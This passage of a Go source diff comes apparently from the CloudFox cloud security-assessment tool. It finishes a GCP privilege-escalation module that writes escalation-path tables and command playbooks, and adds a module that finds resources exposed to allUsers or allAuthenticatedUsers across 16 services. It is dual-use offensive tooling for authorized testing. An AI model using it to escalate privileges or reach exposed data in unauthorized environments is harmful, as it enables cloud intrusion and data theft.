domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, 
".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + return "" +} + +// findingsForProject returns findings filtered for a specific project +// Includes: SAs from that project + users/groups (which apply to all projects) +func (m *PrivescModule) findingsForProject(projectID string) []foxmapperservice.PrivescFinding { + var filtered []foxmapperservice.PrivescFinding + for _, f := range m.Findings { + principalProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject == projectID || principalProject == "" { + filtered = append(filtered, f) + } + } + return filtered +} + +// findingsToTableBodyForProject returns table body for a specific project's findings +func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, f := range m.Findings { + principalProject := 
extractProjectFromPrincipal(f.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject != projectID && principalProject != "" { + continue + } + + // For display, show the principal's project or "-" for users/groups + displayProject := principalProject + if displayProject == "" { + displayProject = "-" + } + + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + confidence := "-" + permission := "-" + + if f.CanEscalate && len(f.Paths) > 0 { + bestPath := f.Paths[0] + privescTo = bestPath.Destination + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Get the permission from the first edge + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } + + // Format privesc admin level + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } + + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" 
+ } + case "project": + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } + } + + body = append(body, []string{ + displayProject, + f.MemberType, + f.Principal, + isAdmin, + adminLevel, + privescTo, + privescAdminLevel, + hops, + confidence, + permission, + }) + } + return body +} + +// generatePlaybookForProject generates a loot file specific to a project +func (m *PrivescModule) generatePlaybookForProject(projectID string) *internal.LootFile { + findings := m.findingsForProject(projectID) + if len(findings) == 0 { + return nil + } + + var sb strings.Builder + sb.WriteString("# GCP Privilege Escalation Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) + sb.WriteString("# Generated by CloudFox using FoxMapper graph data\n\n") + + // Group findings by admin level reachable + var orgPaths, folderPaths, projectPaths []foxmapperservice.PrivescFinding + + for _, f := range findings { + if f.IsAdmin || !f.CanEscalate { + continue + } + switch f.HighestAdminLevel { + case "org": + orgPaths = append(orgPaths, f) + case "folder": + folderPaths = append(folderPaths, f) + case "project": + projectPaths = append(projectPaths, f) + } + } + + if len(orgPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# CRITICAL: Organization Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range orgPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + if len(folderPaths) > 0 { + sb.WriteString("# 
=============================================================================\n") + sb.WriteString("# HIGH: Folder Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range folderPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + if len(projectPaths) > 0 { + sb.WriteString("# =============================================================================\n") + sb.WriteString("# MEDIUM: Project Admin Reachable\n") + sb.WriteString("# =============================================================================\n\n") + for _, f := range projectPaths { + m.writePrivescFindingToPlaybook(&sb, f) + } + } + + contents := sb.String() + // Check if empty (just header) + headerOnly := fmt.Sprintf("# GCP Privilege Escalation Commands\n# Project: %s\n# Generated by CloudFox using FoxMapper graph data\n\n", projectID) + if contents == headerOnly { + return nil + } + + return &internal.LootFile{ + Name: "privesc-commands", + Contents: contents, + } +} + +func (m *PrivescModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + FolderLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Process each specified project + for _, projectID := range m.ProjectIDs { + var tableFiles []internal.TableFile + + // Build table for this project + body := m.findingsToTableBodyForProject(projectID) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: body, + }) + } + + // Generate loot file for this project + var lootFiles []internal.LootFile + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + lootFiles = append(lootFiles, *playbook) + } + + // Always add project to output (even if empty) + 
outputData.ProjectLevelData[projectID] = PrivescOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} + +func (m *PrivescModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Build table with all findings + if len(m.Findings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "privesc-permissions", + Header: m.getHeader(), + Body: m.findingsToTableBody(), + }) + } + + // Generate per-project playbooks + var lootFiles []internal.LootFile + for _, projectID := range m.ProjectIDs { + playbook := m.generatePlaybookForProject(projectID) + if playbook != nil { + // Rename to include project for flat output + playbook.Name = fmt.Sprintf("privesc-commands-%s", projectID) + lootFiles = append(lootFiles, *playbook) + } + } + + output := PrivescOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME) + } +} diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go new file mode 100644 index 00000000..37d92a26 --- /dev/null +++ b/gcp/commands/publicaccess.go @@ -0,0 +1,1303 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + pubsubservice 
"github.com/BishopFox/cloudfox/gcp/services/pubsubService" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + artifactregistry "google.golang.org/api/artifactregistry/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" + compute "google.golang.org/api/compute/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + notebooks "google.golang.org/api/notebooks/v1" + run "google.golang.org/api/run/v2" + secretmanager "google.golang.org/api/secretmanager/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + storage "google.golang.org/api/storage/v1" +) + +var GCPPublicAccessCommand = &cobra.Command{ + Use: globals.GCP_PUBLICACCESS_MODULE_NAME, + Aliases: []string{"public", "allUsers", "public-resources"}, + Short: "Find resources with allUsers or allAuthenticatedUsers access", + Long: `Enumerate ALL GCP resources that have public access via allUsers or allAuthenticatedUsers. + +This module checks IAM policies on resources across all supported GCP services to identify +resources that are publicly accessible to anyone on the internet. 
+ +Services Checked (16 total): +- Cloud Storage buckets +- BigQuery datasets and tables +- Compute Engine snapshots and images +- Cloud Run services +- Cloud Functions (v2) +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Artifact Registry repositories +- Cloud KMS crypto keys +- Cloud Spanner instances and databases +- Dataflow jobs +- Dataproc clusters +- Vertex AI Workbench notebooks +- Cloud Source Repositories + +Access Levels: +- allUsers: Anyone on the internet (no authentication required) +- allAuthenticatedUsers: Anyone with a Google account (authenticated) + +Both levels are considered "public" as allAuthenticatedUsers includes ANY Google account, +not just accounts in your organization.`, + Run: runGCPPublicAccessCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type PublicResource struct { + ResourceType string // Service type (Storage, BigQuery, etc.) + ResourceName string // Resource identifier + ProjectID string // Project containing the resource + Location string // Region/zone if applicable + AccessLevel string // allUsers or allAuthenticatedUsers + Role string // IAM role granted publicly + Size string // Size if applicable + AdditionalInfo string // Extra context +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PublicAccessModule struct { + gcpinternal.BaseGCPModule + + ProjectPublicResources map[string][]PublicResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PublicAccessOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PublicAccessOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PublicAccessOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ 
+func runGCPPublicAccessCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBLICACCESS_MODULE_NAME) + if err != nil { + return + } + + module := &PublicAccessModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPublicResources: make(map[string][]PublicResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PublicAccessModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating public resources (allUsers/allAuthenticatedUsers)...", globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBLICACCESS_MODULE_NAME, m.processProject) + + allResources := m.getAllPublicResources() + if len(allResources) == 0 { + logger.InfoM("No public resources found", globals.GCP_PUBLICACCESS_MODULE_NAME) + return + } + + // Count by access level + allUsersCount := 0 + allAuthCount := 0 + for _, r := range allResources { + if r.AccessLevel == "allUsers" { + allUsersCount++ + } else { + allAuthCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d public resource(s): %d allUsers, %d allAuthenticatedUsers", + len(allResources), allUsersCount, allAuthCount), globals.GCP_PUBLICACCESS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PublicAccessModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking public access in project: %s", projectID), globals.GCP_PUBLICACCESS_MODULE_NAME) + } + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } 
+ m.LootMap[projectID]["public-access-commands"] = &internal.LootFile{ + Name: "public-access-commands", + Contents: "# Public Access Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.mu.Unlock() + + // Check all services in parallel + var wg sync.WaitGroup + + // 1. Cloud Storage buckets + wg.Add(1) + go func() { + defer wg.Done() + m.checkStorageBuckets(ctx, projectID, logger) + }() + + // 2. Compute Engine snapshots + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeSnapshots(ctx, projectID, logger) + }() + + // 3. Compute Engine images + wg.Add(1) + go func() { + defer wg.Done() + m.checkComputeImages(ctx, projectID, logger) + }() + + // 4. BigQuery datasets + wg.Add(1) + go func() { + defer wg.Done() + m.checkBigQueryDatasets(ctx, projectID, logger) + }() + + // 5. Cloud Run services + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudRunServices(ctx, projectID, logger) + }() + + // 6. Cloud Functions + wg.Add(1) + go func() { + defer wg.Done() + m.checkCloudFunctions(ctx, projectID, logger) + }() + + // 7. Pub/Sub topics + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubTopics(ctx, projectID, logger) + }() + + // 8. Pub/Sub subscriptions + wg.Add(1) + go func() { + defer wg.Done() + m.checkPubSubSubscriptions(ctx, projectID, logger) + }() + + // 9. Secret Manager secrets + wg.Add(1) + go func() { + defer wg.Done() + m.checkSecretManagerSecrets(ctx, projectID, logger) + }() + + // 10. Artifact Registry repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkArtifactRegistry(ctx, projectID, logger) + }() + + // 11. Cloud KMS keys + wg.Add(1) + go func() { + defer wg.Done() + m.checkKMSKeys(ctx, projectID, logger) + }() + + // 12. Cloud Spanner instances/databases + wg.Add(1) + go func() { + defer wg.Done() + m.checkSpanner(ctx, projectID, logger) + }() + + // 13. 
Dataflow jobs + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataflowJobs(ctx, projectID, logger) + }() + + // 14. Dataproc clusters + wg.Add(1) + go func() { + defer wg.Done() + m.checkDataprocClusters(ctx, projectID, logger) + }() + + // 15. Vertex AI Workbench (Notebooks) + wg.Add(1) + go func() { + defer wg.Done() + m.checkNotebooks(ctx, projectID, logger) + }() + + // 16. Source Repositories + wg.Add(1) + go func() { + defer wg.Done() + m.checkSourceRepos(ctx, projectID, logger) + }() + + wg.Wait() +} + +// checkStorageBuckets checks Cloud Storage buckets for public access +func (m *PublicAccessModule) checkStorageBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + return + } + + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list buckets in project %s", projectID)) + return + } + + for _, bucket := range resp.Items { + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Cloud Storage", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Storage class: %s", bucket.StorageClass), + } + m.addResource(resource) + } + } + } + } +} + +// checkComputeSnapshots checks Compute Engine snapshots for public access +func (m *PublicAccessModule) checkComputeSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { 
+ for _, snapshot := range page.Items { + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Compute Snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Source disk: %s", publicAccessExtractResourceName(snapshot.SourceDisk)), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list snapshots in project %s", projectID)) + } +} + +// checkComputeImages checks Compute Engine images for public access +func (m *PublicAccessModule) checkComputeImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Compute Image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + AdditionalInfo: fmt.Sprintf("Family: %s", image.Family), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list images in project %s", projectID)) 
+ } +} + +// checkBigQueryDatasets checks BigQuery datasets for public access +func (m *PublicAccessModule) checkBigQueryDatasets(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list BigQuery datasets in project %s", projectID)) + return + } + + for _, dataset := range datasets { + if dataset.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Dataset", + ResourceName: dataset.DatasetID, + ProjectID: projectID, + Location: dataset.Location, + AccessLevel: dataset.PublicAccess, + Role: "Dataset Access", + AdditionalInfo: fmt.Sprintf("Encryption: %s", dataset.EncryptionType), + } + m.addResource(resource) + } + } + + // Also check individual tables + for _, dataset := range datasets { + tables, err := bq.BigqueryTables(projectID, dataset.DatasetID) + if err != nil { + continue + } + + for _, table := range tables { + if table.IsPublic { + resource := PublicResource{ + ResourceType: "BigQuery Table", + ResourceName: fmt.Sprintf("%s.%s", dataset.DatasetID, table.TableID), + ProjectID: projectID, + Location: table.Location, + AccessLevel: table.PublicAccess, + Role: "Table Access", + Size: publicAccessFormatBytes(table.NumBytes), + AdditionalInfo: fmt.Sprintf("Rows: %d, Type: %s", table.NumRows, table.TableType), + } + m.addResource(resource) + } + } + } +} + +// checkCloudRunServices checks Cloud Run services for public access +func (m *PublicAccessModule) checkCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + return + } + + // List all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := runService.Projects.Locations.Services.List(parent) + err = req.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error 
{ + for _, svc := range page.Services { + // Get IAM policy + resource := svc.Name + policy, err := runService.Projects.Locations.Services.GetIamPolicy(resource).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + serviceName := publicAccessExtractResourceName(svc.Name) + location := publicAccessExtractLocation(svc.Name) + res := PublicResource{ + ResourceType: "Cloud Run", + ResourceName: serviceName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", svc.Uri), + } + m.addResource(res) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + } +} + +// checkCloudFunctions checks Cloud Functions for public access +func (m *PublicAccessModule) checkCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + cfService, err := cloudfunctions.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := cfService.Projects.Locations.Functions.List(parent) + err = req.Pages(ctx, func(page *cloudfunctions.ListFunctionsResponse) error { + for _, fn := range page.Functions { + // Get IAM policy + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + funcName := publicAccessExtractResourceName(fn.Name) + location := publicAccessExtractLocation(fn.Name) + + // Get URL + url := "" + if fn.ServiceConfig != nil { + url = fn.ServiceConfig.Uri + } + + resource := PublicResource{ + ResourceType: "Cloud Function", + ResourceName: funcName, + ProjectID: projectID, + 
Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s, Runtime: %s", url, fn.BuildConfig.Runtime), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + } +} + +// checkPubSubTopics checks Pub/Sub topics for public access +func (m *PublicAccessModule) checkPubSubTopics(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + topics, err := ps.Topics(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Pub/Sub topics in project %s", projectID)) + return + } + + for _, topic := range topics { + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Pub/Sub Topic", + ResourceName: topic.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Subscriptions: %d", topic.SubscriptionCount), + } + m.addResource(resource) + } + } + } +} + +// checkPubSubSubscriptions checks Pub/Sub subscriptions for public access +func (m *PublicAccessModule) checkPubSubSubscriptions(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return + } + + for _, sub := range subs { + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Pub/Sub Subscription", + ResourceName: sub.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Topic: %s", sub.Topic), + } + m.addResource(resource) + } + } + } +} + +// checkSecretManagerSecrets checks Secret Manager secrets 
for public access +func (m *PublicAccessModule) checkSecretManagerSecrets(ctx context.Context, projectID string, logger internal.Logger) { + smService, err := secretmanager.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := smService.Projects.Secrets.List(parent) + err = req.Pages(ctx, func(page *secretmanager.ListSecretsResponse) error { + for _, secret := range page.Secrets { + // Get IAM policy + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + secretName := publicAccessExtractResourceName(secret.Name) + resource := PublicResource{ + ResourceType: "Secret Manager", + ResourceName: secretName, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Replication: %v", secret.Replication), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list secrets in project %s", projectID)) + } +} + +// checkArtifactRegistry checks Artifact Registry repositories for public access +func (m *PublicAccessModule) checkArtifactRegistry(ctx context.Context, projectID string, logger internal.Logger) { + arService, err := artifactregistry.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := arService.Projects.Locations.Repositories.List(parent) + err = req.Pages(ctx, func(page *artifactregistry.ListRepositoriesResponse) error { + for _, repo := range page.Repositories { + // Get IAM policy + policy, err := arService.Projects.Locations.Repositories.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if 
shared.IsPublicPrincipal(member) { + repoName := publicAccessExtractResourceName(repo.Name) + location := publicAccessExtractLocation(repo.Name) + resource := PublicResource{ + ResourceType: "Artifact Registry", + ResourceName: repoName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Format: %s", repo.Format), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Artifact Registry repos in project %s", projectID)) + } +} + +// checkKMSKeys checks Cloud KMS keys for public access +func (m *PublicAccessModule) checkKMSKeys(ctx context.Context, projectID string, logger internal.Logger) { + kmsSvc := kmsservice.New() + keys, err := kmsSvc.CryptoKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list KMS keys in project %s", projectID)) + return + } + + for _, key := range keys { + for _, binding := range key.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Cloud KMS", + ResourceName: key.Name, + ProjectID: projectID, + Location: key.Location, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("KeyRing: %s, Purpose: %s, Protection: %s", key.KeyRing, key.Purpose, key.ProtectionLevel), + } + m.addResource(resource) + } + } + } +} + +// checkSpanner checks Cloud Spanner instances/databases for public access +func (m *PublicAccessModule) checkSpanner(ctx context.Context, projectID string, logger internal.Logger) { + spannerSvc := spannerservice.New() + result, err := spannerSvc.ListInstancesAndDatabases(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Spanner in project %s", projectID)) + return + 
} + + // Check instances + for _, instance := range result.Instances { + for _, binding := range instance.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Spanner Instance", + ResourceName: instance.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Config: %s, Nodes: %d", instance.Config, instance.NodeCount), + } + m.addResource(resource) + } + } + } + + // Check databases + for _, db := range result.Databases { + for _, binding := range db.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Spanner Database", + ResourceName: db.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Instance: %s, Encryption: %s", db.InstanceName, db.EncryptionType), + } + m.addResource(resource) + } + } + } +} + +// checkDataflowJobs checks Dataflow jobs for public IAM access +func (m *PublicAccessModule) checkDataflowJobs(ctx context.Context, projectID string, logger internal.Logger) { + dfService, err := dataflow.NewService(ctx) + if err != nil { + return + } + + // List jobs across all regions + req := dfService.Projects.Jobs.List(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + // Get IAM policy for job (requires aggregated) + // Note: Dataflow jobs don't have direct IAM policies, but we check job type + // Jobs reading from public sources can be a concern + if job.Type == "JOB_TYPE_STREAMING" || job.Type == "JOB_TYPE_BATCH" { + // Check if job has public-facing inputs (like Pub/Sub with allUsers) + // This is informational - jobs themselves don't have IAM + // but we flag them if they have concerning configurations + if hasPublicDataflowConfig(job) { + resource := PublicResource{ + ResourceType: "Dataflow Job", + ResourceName: job.Name, + ProjectID: projectID, + Location: 
